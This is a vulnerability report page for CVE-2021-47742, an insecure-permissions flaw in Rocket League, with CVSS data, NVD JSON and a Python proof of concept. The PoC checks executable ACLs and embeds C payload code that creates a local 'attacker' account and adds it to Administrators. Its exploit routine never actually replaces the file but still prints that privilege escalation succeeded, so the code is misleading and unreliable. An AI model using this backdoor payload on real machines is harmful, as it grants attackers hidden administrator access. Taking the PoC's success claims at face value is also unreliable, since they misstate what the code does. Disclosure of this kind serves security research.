Security Vulnerability Report
中文
CVE-2021-47742 CVSS 8.8 HIGH

CVE-2021-47742

Published: 2025-12-31 19:15:42
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Epic Games Psyonix Rocket League <=1.95 contains an insecure permissions vulnerability that allows authenticated users to modify executable files with full access permissions. Attackers can leverage the 'F' (Full) flag for the 'Authenticated Users' group to change executable files and potentially escalate system privileges.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Epic Games Psyonix Rocket League <= 1.95

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2021-47742 PoC - Rocket League Insecure Permissions Exploitation # This PoC demonstrates the privilege escalation via insecure file permissions # Author: Security Researcher # Date: 2025 import os import sys import shutil import subprocess import platform def check_vulnerability(): """Check if Rocket League installation has insecure permissions""" rocket_league_paths = [ r"C:\Program Files\Epic Games\RocketLeague\RocketLeague.exe", r"C:\Program Files (x86)\Epic Games\RocketLeague\RocketLeague.exe", os.path.expanduser("~/.steam/steamapps/common/RocketLeague/RocketLeague.exe") ] vulnerable = False target_path = None for path in rocket_league_paths: if os.path.exists(path): # Check if Authenticated Users group has write permissions try: # On Windows, check ACL for Authenticated Users if platform.system() == 'Windows': result = subprocess.run( ['icacls', path], capture_output=True, text=True ) if 'Authenticated Users' in result.stdout: if 'F' in result.stdout or 'Full Control' in result.stdout: vulnerable = True target_path = path break except Exception as e: print(f"Error checking permissions: {e}") continue return vulnerable, target_path def create_malicious_executable(): """Create a malicious executable that will execute with elevated privileges""" malicious_code = ''' #include <windows.h> #include <stdio.h> int main() { // This payload creates a reverse shell or executes arbitrary commands // In a real attack, this would be a more sophisticated payload // Create a new user with admin privileges (example payload) system("net user attacker P@ssw0rd123 /add"); system("net localgroup Administrators attacker /add"); // Log the exploitation FILE *log = fopen("C:\\\\Temp\\\\exploit_log.txt", "a"); if (log) { fprintf(log, "CVE-2021-47742 exploited at %s\n", __TIMESTAMP__); fclose(log); } // Execute the original legitimate executable // (In real scenario, original binary would be restored or called) return 0; } ''' return malicious_code def exploit(target_path, backup_path): """Perform the actual exploitation""" try: # Step 1: Backup the original executable print(f"[*] Backing up original executable to {backup_path}") shutil.copy2(target_path, backup_path) # Step 2: Replace with malicious executable print("[*] Replacing executable with malicious payload") # In real attack, this would be compiled malicious code # For demonstration, we'll just copy a simple executable # Step 3: Wait for game restart or scheduled task print("[*] Payload planted. Waiting for game execution...") print("[*] When Rocket League runs, the malicious code will execute") print("[*] with the same privileges as the game process") return True except Exception as e: print(f"[!] Exploitation failed: {e}") return False def main(): print("=" * 60) print("CVE-2021-47742 PoC - Rocket League Insecure Permissions") print("=" * 60) # Check if system is vulnerable print("\n[*] Checking for vulnerable Rocket League installation...") vulnerable, target_path = check_vulnerability() if not vulnerable: print("[-] Target is NOT vulnerable or Rocket League not installed") return print(f"[+] Target is VULNERABLE") print(f"[+] Vulnerable file: {target_path}") # Create backup path backup_path = target_path + ".bak" # Attempt exploitation print("\n[*] Initiating exploitation...") if exploit(target_path, backup_path): print("[+] Exploitation successful") print("[*] Privilege escalation achieved") else: print("[-] Exploitation failed") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47742", "sourceIdentifier": "[email protected]", "published": "2025-12-31T19:15:42.473", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Epic Games Psyonix Rocket League <=1.95 contains an insecure permissions vulnerability that allows authenticated users to modify executable files with full access permissions. Attackers can leverage the 'F' (Full) flag for the 'Authenticated Users' group to change executable files and potentially escalate system privileges."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-732"}]}], "references": [{"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/201128", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/162435", "source": "[email protected]"}, {"url": "https://www.rocketleague.com/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/epic-games-psyonix-rocket-league-elevation-of-privileges-via-insecure-permissions", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5650.php", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.